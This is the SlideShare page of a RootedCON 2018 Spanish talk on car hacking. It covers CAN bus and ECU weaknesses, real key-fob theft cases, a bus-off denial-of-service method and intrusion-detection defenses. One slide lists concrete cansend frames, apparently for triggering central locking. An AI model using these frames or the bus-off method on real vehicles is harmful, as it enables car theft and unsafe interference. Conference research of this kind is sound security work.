SlideShare a Scribd company logo

Carlos Sahuquillo - Car Hacking: de Angelina Jolie a Charlize Theron [rootedvlc2018]

RootedCON
RootedCON

Durante la charla haré una pequeña introducción a la evolución de las redes intravehiculares para terminar hablando sobre el estado del arte de la Seguridad, cómo los ladrones aprovechan algunas de estas vulnerabilidades para robar coches y algunos de los ataques más comunes que se empiezan a ver en coches conectados. También mostraré un pequeño video/demo que vamos a grabar estos días sobre cómo realizar una denegación de servicio a una centralita (ECU) de un vehículo.

Technology
1 of 37
Download to read offline
1 Car Hacking: De Angelina Jolie a Charlize Theron
2 Los mecánicos de toda la vida
3 Los mecánicos de toda la vida
4 Los mecánicos de toda la vida
5 Mercedes 300: El inicio
6 ¿Qué es una ECU? • An ECU is an embedded system that controls/monitors systems in a car. • Combination of ECUs is known as the cars computer. • The cars “computer” is not one system but a large number of small subsystems connected together by a network.
7 ¿Qué es una ECU? • More than 80 ECUs in a car. • Each ECU (Electronic Control Unit) connected in car represents a separate point of vulnerability to a cyber attack. • If one ECU is compromised, it’s a gateway to every other ECU in the vehicle. • Terabytes of data travel between vehicles, cloud networks, wearables and mobile devices, and, obviously they represent a desirable target for cybercriminals.
8 ¿Qué es una ECU? • The CAN bus is a 30-year old architecture. CAN contains numerous vulnerabilities that are inherent in its design. • Lack of segmentation and Boundary Defense. • Lack of Device Authentication. • Unencrypted Traffic. • Security by obscurity is not security at all
9 Seguridad… por oscuridad
10
11
12 Evolución de las amenazas Early hacks Recent hacks
13 Evolución de las amenazas • Hackers Can steal a Tesla Model S in seconds by cloning its key fob: https://www.wired.com/story/hackers-steal-tesla-model-s-seconds-key-fob/
14 Evolución de las amenazas • A Dutch first: Ingenious BMW theft attempt: https://mrooding.me/a- dutch-first-ingenious-bmw-theft-attempt-5f7f49a96ec8
15 ¿Cómo se accede?
16 Nuestro Laboratorio
17 Nuestro Laboratorio
18 Bus-off attack • Fault tolerance • 5 errors Bit error, Stuff error, CRC error, Form error, ACK error • Counters – TEC: transmit error counter – REC: receive error counter error-active bus-off error-passive TEC > 127 | REC > 127 TEC < 128 & REC < 128 TEC > 255 Reset | 128x11 recessive bits
19 Bus-off attack 0 1 0 1 0 1 0 1 0 0 1 0 1 0 1 0 1 0 0 1 0 1 0 1 0 1 1 0 1 0 1 0 1 0 1 0 0 1 0 1 1 0 1 0 1 0 1 0 1 0 0 1 0 1 0 1 0 1 0
20 Bus-off attack • Attack conditions –Same ID –Same time –Different data 0x107 8 0x08 0xA0 0xFE 0x04 0x80 0x00 0x00 0x04 0x107 8 0x08 0x80 0xFE 0x04 0x80 0x00 0x00 0x04 0 0 0 0 1 0 0 0 1 0 1 0 0 0 0 0 0 0 0 0 0 1 0 0 0 1 0 0 0 1 0 0 0 0 0 0 Error raised TEC1 + 8 Error raised TEC2 + 8 TEC = 128 0 0 0 0 1 0 0 0 1 0 1 0 0 0 0 1 0 0 0 1 0 0 0 1 , , , Error raised TEC1 + 8 TEC2 - 1 TEC1 = 255 Bus-off
21 Bus-off attack
22 Bus-off attack (Bonus track)
23 Central locking cansend can0 184#61A40A0009000200 cansend can0 366#0010001E80030000 cansend can0 184#2F51050118000200 cansend can0 366#0010001E80030000
24 Central locking
25 Park assistant
26 Park assistant • Parking operation ~ 1min – 60.000 can messages – 150 IDs ID Byte 0 Byte 1 Byte 2 Byte 3 Byte 4 Byte 5 Byte 6 Byte 7 130 EB 6A 16 00 06 00 04 80 130 8F 6B 16 00 06 00 04 80 130 9C 6C 16 00 06 00 04 80 130 CB 6D 15 00 06 00 04 80 130 01 6E 13 00 06 00 04 80 130 A2 6F 11 00 06 00 04 80 130 C5 61 0E 00 06 00 04 80
27 Park assistant
28 GPS spoofing
29 El futuro
30 El futuro
31 El futuro
32 Cómo podemos protegernos
33 No parece que vaya a dejar de utilizarse http://eecatalog.com/automotive/2013/03/13/automotive-communication-protocols-preparing-for-the- future/
34 Cómo podemos protegernos • IDPS: Real Time Detection and Neutralization – CANBUS Packet Inspection – Context Analysis – Detects malicious CAN messages using ML algorithms – Zero days detection (based on behavior) – Low delay to manage the HUGE amount of data
35 Agradecimientos • A XXXX: por anular la garantía del coche cuando fuimos la primera vez con una ECU brickeada:
36
37 Muchas gracias Carlos Sahuquillo Pascual Automotive CyberSecurity Consultant @csahuqui on Twitter https://sahuquillo.org Igor Robles Puente Automotive CyberSecurity Research Engineer

Recommended

Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]RootedCON
 
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK FrameworkSecure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK FrameworkLeszek Mi?
 
Why are we still vulnerable to Side Channel Attacks?
Why are we still vulnerable to Side Channel Attacks?Why are we still vulnerable to Side Channel Attacks?
Why are we still vulnerable to Side Channel Attacks?Riscure
 
Lowering the bar: deep learning for side-channel analysis
Lowering the bar: deep learning for side-channel analysisLowering the bar: deep learning for side-channel analysis
Lowering the bar: deep learning for side-channel analysisRiscure
 
How multi-fault injection breaks the security of smart cards
How multi-fault injection breaks the security of smart cardsHow multi-fault injection breaks the security of smart cards
How multi-fault injection breaks the security of smart cardsRiscure
 
HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...
HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...
HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...jamieayre
 
lesson2 - Nodemcu course - NodeMCU dev Board
lesson2 - Nodemcu course - NodeMCU dev Board lesson2 - Nodemcu course - NodeMCU dev Board
lesson2 - Nodemcu course - NodeMCU dev BoardElaf A.Saeed
 
Software Attacks on Hardware Wallets
Software Attacks on Hardware WalletsSoftware Attacks on Hardware Wallets
Software Attacks on Hardware WalletsPriyanka Aash
 

Recommended

Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]Raúl Siles - IOT: INTERNET OF T... [rooted2018]
Raúl Siles - IOT: INTERNET OF T... [rooted2018]RootedCON
 
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK FrameworkSecure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK FrameworkLeszek Mi?
 
Why are we still vulnerable to Side Channel Attacks?
Why are we still vulnerable to Side Channel Attacks?Why are we still vulnerable to Side Channel Attacks?
Why are we still vulnerable to Side Channel Attacks?Riscure
 
Lowering the bar: deep learning for side-channel analysis
Lowering the bar: deep learning for side-channel analysisLowering the bar: deep learning for side-channel analysis
Lowering the bar: deep learning for side-channel analysisRiscure
 
How multi-fault injection breaks the security of smart cards
How multi-fault injection breaks the security of smart cardsHow multi-fault injection breaks the security of smart cards
How multi-fault injection breaks the security of smart cardsRiscure
 
HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...
HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...
HIS 2017 David Oswald- Your car is not a safe box - breaking automotive keyle...jamieayre
 
lesson2 - Nodemcu course - NodeMCU dev Board
lesson2 - Nodemcu course - NodeMCU dev Board lesson2 - Nodemcu course - NodeMCU dev Board
lesson2 - Nodemcu course - NodeMCU dev BoardElaf A.Saeed
 
Software Attacks on Hardware Wallets
Software Attacks on Hardware WalletsSoftware Attacks on Hardware Wallets
Software Attacks on Hardware WalletsPriyanka Aash
 
Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris Valasek
Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris ValasekSuns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris Valasek
Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris ValasekShakacon
 
The Current State of Automotive Security by Chris Valasek
The Current State of Automotive Security by Chris ValasekThe Current State of Automotive Security by Chris Valasek
The Current State of Automotive Security by Chris ValasekCODE BLUE
 
Embedded Systems in Automotive
Embedded Systems in Automotive Embedded Systems in Automotive
Embedded Systems in Automotive محمدعبد الحى
 
Offensive Payment Security
Offensive Payment SecurityOffensive Payment Security
Offensive Payment SecurityPayment Village
 
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
自動車セキュリティの現状 by クリス・ヴァラセク Chris ValasekCODE BLUE
 
The Great Train Robbery: Fast and Furious
The Great Train Robbery: Fast and FuriousThe Great Train Robbery: Fast and Furious
The Great Train Robbery: Fast and FuriousSergey Gordeychik
 
Automotive electronics
Automotive electronicsAutomotive electronics
Automotive electronicsjeet1991
 
[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...Shivam Patel
 
Final presentation
Final presentationFinal presentation
Final presentationViral Shah
 
Gentlemen, Start Your Engines 20120514
Gentlemen, Start Your Engines 20120514Gentlemen, Start Your Engines 20120514
Gentlemen, Start Your Engines 20120514Mattias Jidhage
 
Computer Science Training,IT Training,CS Training,Computer Training Institute,
Computer Science Training,IT Training,CS Training,Computer Training Institute,Computer Science Training,IT Training,CS Training,Computer Training Institute,
Computer Science Training,IT Training,CS Training,Computer Training Institute,Technogroovy
 
Abusing the Train Communication Network or What could have derailed the North...
Abusing the Train Communication Network or What could have derailed the North...Abusing the Train Communication Network or What could have derailed the North...
Abusing the Train Communication Network or What could have derailed the North...Moshe Zioni
 
HM2015
HM2015HM2015
HM2015Soumyadeep Mukherjee
 
Electronic toll system
Electronic toll systemElectronic toll system
Electronic toll systemNishigandha Gawas
 
iot review 1.pptx
iot review 1.pptxiot review 1.pptx
iot review 1.pptxSnekaJ
 
"The Great Train Cyber Robbery" SCADAStrangeLove
"The Great Train Cyber Robbery" SCADAStrangeLove"The Great Train Cyber Robbery" SCADAStrangeLove
"The Great Train Cyber Robbery" SCADAStrangeLoveAleksandr Timorin
 
Atm technology and operations
Atm technology and operationsAtm technology and operations
Atm technology and operationsAnil Chaurasiya
 
Intelligent mcc Siemens
Intelligent mcc Siemens Intelligent mcc Siemens
Intelligent mcc Siemens Praveen Patil
 
Atm hacking and cracking to steal money with atm backdoor default master pass...
Atm hacking and cracking to steal money with atm backdoor default master pass...Atm hacking and cracking to steal money with atm backdoor default master pass...
Atm hacking and cracking to steal money with atm backdoor default master pass...FREDDY KEKANA
 
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...Chanwoo Choi
 
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRootedCON
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...RootedCON
 

More Related Content

Similar to Carlos Sahuquillo - Car Hacking: de Angelina Jolie a Charlize Theron [rootedvlc2018]

Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris Valasek
Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris ValasekSuns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris Valasek
Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris ValasekShakacon
 
The Current State of Automotive Security by Chris Valasek
The Current State of Automotive Security by Chris ValasekThe Current State of Automotive Security by Chris Valasek
The Current State of Automotive Security by Chris ValasekCODE BLUE
 
Offensive Payment Security
Offensive Payment SecurityOffensive Payment Security
Offensive Payment SecurityPayment Village
 
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
自動車セキュリティの現状 by クリス・ヴァラセク Chris ValasekCODE BLUE
 
The Great Train Robbery: Fast and Furious
The Great Train Robbery: Fast and FuriousThe Great Train Robbery: Fast and Furious
The Great Train Robbery: Fast and FuriousSergey Gordeychik
 
Automotive electronics
Automotive electronicsAutomotive electronics
Automotive electronicsjeet1991
 
[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...Shivam Patel
 
Final presentation
Final presentationFinal presentation
Final presentationViral Shah
 
Gentlemen, Start Your Engines 20120514
Gentlemen, Start Your Engines 20120514Gentlemen, Start Your Engines 20120514
Gentlemen, Start Your Engines 20120514Mattias Jidhage
 
Computer Science Training,IT Training,CS Training,Computer Training Institute,
Computer Science Training,IT Training,CS Training,Computer Training Institute,Computer Science Training,IT Training,CS Training,Computer Training Institute,
Computer Science Training,IT Training,CS Training,Computer Training Institute,Technogroovy
 
Abusing the Train Communication Network or What could have derailed the North...
Abusing the Train Communication Network or What could have derailed the North...Abusing the Train Communication Network or What could have derailed the North...
Abusing the Train Communication Network or What could have derailed the North...Moshe Zioni
 
iot review 1.pptx
iot review 1.pptxiot review 1.pptx
iot review 1.pptxSnekaJ
 
"The Great Train Cyber Robbery" SCADAStrangeLove
"The Great Train Cyber Robbery" SCADAStrangeLove"The Great Train Cyber Robbery" SCADAStrangeLove
"The Great Train Cyber Robbery" SCADAStrangeLoveAleksandr Timorin
 
Atm technology and operations
Atm technology and operationsAtm technology and operations
Atm technology and operationsAnil Chaurasiya
 
Intelligent mcc Siemens
Intelligent mcc Siemens Intelligent mcc Siemens
Intelligent mcc Siemens Praveen Patil
 
Atm hacking and cracking to steal money with atm backdoor default master pass...
Atm hacking and cracking to steal money with atm backdoor default master pass...Atm hacking and cracking to steal money with atm backdoor default master pass...
Atm hacking and cracking to steal money with atm backdoor default master pass...FREDDY KEKANA
 
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...Chanwoo Choi
 

Similar to Carlos Sahuquillo - Car Hacking: de Angelina Jolie a Charlize Theron [rootedvlc2018] (20)

Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris Valasek
Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris ValasekSuns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris Valasek
Suns Out Guns Out: Hacking without a Vehicle by Charlie Miller & Chris Valasek
 
The Current State of Automotive Security by Chris Valasek
The Current State of Automotive Security by Chris ValasekThe Current State of Automotive Security by Chris Valasek
The Current State of Automotive Security by Chris Valasek
 
Embedded Systems in Automotive
Embedded Systems in Automotive Embedded Systems in Automotive
Embedded Systems in Automotive
 
Offensive Payment Security
Offensive Payment SecurityOffensive Payment Security
Offensive Payment Security
 
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
自動車セキュリティの現状 by クリス・ヴァラセク Chris Valasek
 
The Great Train Robbery: Fast and Furious
The Great Train Robbery: Fast and FuriousThe Great Train Robbery: Fast and Furious
The Great Train Robbery: Fast and Furious
 
Automotive electronics
Automotive electronicsAutomotive electronics
Automotive electronics
 
[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...
 
Final presentation
Final presentationFinal presentation
Final presentation
 
Gentlemen, Start Your Engines 20120514
Gentlemen, Start Your Engines 20120514Gentlemen, Start Your Engines 20120514
Gentlemen, Start Your Engines 20120514
 
Computer Science Training,IT Training,CS Training,Computer Training Institute,
Computer Science Training,IT Training,CS Training,Computer Training Institute,Computer Science Training,IT Training,CS Training,Computer Training Institute,
Computer Science Training,IT Training,CS Training,Computer Training Institute,
 
Abusing the Train Communication Network or What could have derailed the North...
Abusing the Train Communication Network or What could have derailed the North...Abusing the Train Communication Network or What could have derailed the North...
Abusing the Train Communication Network or What could have derailed the North...
 
HM2015
HM2015HM2015
HM2015
 
Electronic toll system
Electronic toll systemElectronic toll system
Electronic toll system
 
iot review 1.pptx
iot review 1.pptxiot review 1.pptx
iot review 1.pptx
 
"The Great Train Cyber Robbery" SCADAStrangeLove
"The Great Train Cyber Robbery" SCADAStrangeLove"The Great Train Cyber Robbery" SCADAStrangeLove
"The Great Train Cyber Robbery" SCADAStrangeLove
 
Atm technology and operations
Atm technology and operationsAtm technology and operations
Atm technology and operations
 
Intelligent mcc Siemens
Intelligent mcc Siemens Intelligent mcc Siemens
Intelligent mcc Siemens
 
Atm hacking and cracking to steal money with atm backdoor default master pass...
Atm hacking and cracking to steal money with atm backdoor default master pass...Atm hacking and cracking to steal money with atm backdoor default master pass...
Atm hacking and cracking to steal money with atm backdoor default master pass...
 
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...
 

More from RootedCON

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRootedCON
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...RootedCON
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRootedCON
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_RootedCON
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...RootedCON
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...RootedCON
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...RootedCON
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRootedCON
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...RootedCON
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRootedCON
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...RootedCON
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRootedCON
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...RootedCON
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRootedCON
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRootedCON
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRootedCON
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...RootedCON
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...RootedCON
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRootedCON
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRootedCON
 

More from RootedCON (20)

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
